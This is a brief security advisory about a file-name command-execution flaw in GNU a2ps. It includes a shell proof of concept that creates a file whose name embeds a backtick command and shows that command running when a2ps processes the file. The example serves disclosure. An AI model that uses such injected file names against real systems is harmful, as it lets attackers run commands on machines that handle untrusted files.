|
|
GNU a2ps File Name Command Execution Vulnerability
No exploit it required to leverage this issue. The following proof of concept has been provided: The issue can be illustrated with the following set of shell commands: $ touch 'x`echo >&2 42`.c' $ a2ps -o /dev/null *.c 42 [x`echo >&2 42`.c (C): 0 pages on 0 sheets] [Total: 0 pages on 0 sheets] saved into the file `/dev/null' |
|
Privacy Statement |